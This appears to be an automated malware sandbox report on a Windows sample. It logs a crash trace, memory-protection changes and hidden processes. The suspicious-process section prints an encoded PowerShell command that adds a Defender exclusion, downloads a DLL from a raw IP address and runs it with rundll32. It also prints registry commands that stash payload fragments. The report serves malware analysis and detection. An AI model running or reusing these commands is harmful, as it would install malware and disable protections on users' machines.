__exception__ March 7, 2023, 9:58 a.m.	stacktrace: CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75d2d08c TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75d2964b TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75d14d6b TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75d16f7c CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75d1e825 TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75d16002 TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75d15fe8 TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75d149e3 TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75d15a20 RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x774a9a91 LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x774c8f10 RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x774c8e5c ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x74e87a25 wscript+0x2fbd @ 0xa22fbd BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5 exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25 exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4 exception.instruction: call dword ptr [ecx + 0xc] exception.module: MSCTF.dll exception.exception_code: 0xc0000005 exception.offset: 278260 exception.address: 0x75d43ef4 registers.esp: 2882184 registers.edi: 0 registers.eax: 42835416 registers.ebp: 2882212 registers.edx: 1 registers.ebx: 0 registers.esi: 7759544 registers.ecx: 1944794836	1	0	0

Time & API

Arguments

Status

Return

Repeated

__exception__

March 7, 2023, 9:58 a.m.

stacktrace:

CtfImeIsIME+0x36fd DllUnregisterServer-0xf9d9 msctf+0x2d08c @ 0x75d2d08c
TF_GetGlobalCompartment+0x3dfd CtfImeIsIME-0x344 msctf+0x2964b @ 0x75d2964b
TF_GetInputScope+0xf65 CtfImeDestroyThreadMgr-0x25ae msctf+0x14d6b @ 0x75d14d6b
TF_GetInputScope+0x3176 CtfImeDestroyThreadMgr-0x39d msctf+0x16f7c @ 0x75d16f7c
CtfImeDestroyInputContext+0x280 TF_CanUninitialize-0x1c msctf+0x1e825 @ 0x75d1e825
TF_GetInputScope+0x21fc CtfImeDestroyThreadMgr-0x1317 msctf+0x16002 @ 0x75d16002
TF_GetInputScope+0x21e2 CtfImeDestroyThreadMgr-0x1331 msctf+0x15fe8 @ 0x75d15fe8
TF_GetInputScope+0xbdd CtfImeDestroyThreadMgr-0x2936 msctf+0x149e3 @ 0x75d149e3
TF_GetInputScope+0x1c1a CtfImeDestroyThreadMgr-0x18f9 msctf+0x15a20 @ 0x75d15a20
RtlIsCurrentThreadAttachExempt+0x5f TpCheckTerminateWorker-0x37 ntdll+0x39a91 @ 0x774a9a91
LdrShutdownProcess+0x97 RtlDetectHeapLeaks-0x1bb ntdll+0x58f10 @ 0x774c8f10
RtlExitUserProcess+0x74 LdrShutdownProcess-0x1d ntdll+0x58e5c @ 0x774c8e5c
ExitProcess+0x15 TerminateThread-0xa kernel32+0x17a25 @ 0x74e87a25
wscript+0x2fbd @ 0xa22fbd
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x74e833ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x774a9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x774a9ea5

exception.instruction_r: ff 51 0c 8b 45 fc 89 be 8c 04 00 00 3b c7 74 25
exception.symbol: TF_GetCompatibleKeyboardLayout+0x5885 TF_IsCtfmonRunning-0xfd3 msctf+0x43ef4
exception.instruction: call dword ptr [ecx + 0xc]
exception.module: MSCTF.dll
exception.exception_code: 0xc0000005
exception.offset: 278260
exception.address: 0x75d43ef4
registers.esp: 2882184
registers.edi: 0
registers.eax: 42835416
registers.ebp: 2882212
registers.edx: 1
registers.ebx: 0
registers.esi: 7759544
registers.ecx: 1944794836

Allocates read-write-execute memory (usually to unpack itself) (50 out of 281 events)

Time & API	Arguments	Status
NtProtectVirtualMemory March 7, 2023, 9:57 a.m.	process_identifier: 3044 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73e53000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02710000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73971000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0253a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73972000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02532000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02542000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0256a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02543000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02544000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0257b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02577000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0253b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02562000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02575000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0256c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02960000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0257c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02563000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02564000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02565000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02566000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02567000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02568000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02569000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ad9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ada000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02adb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02adc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02add000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ade000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02adf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 7, 2023, 9:58 a.m.	process_identifier: 2820 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02ae3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane \| %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane"
cmdline	powershell $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane \| %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane"

A process created a hidden window (5 events)

Time & API	Arguments	Status	Return
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: reg parameters: add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT filepath: reg	1	1
ShellExecuteExW March 7, 2023, 9:58 a.m.	show_type: 0 filepath_r: reg parameters: add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkA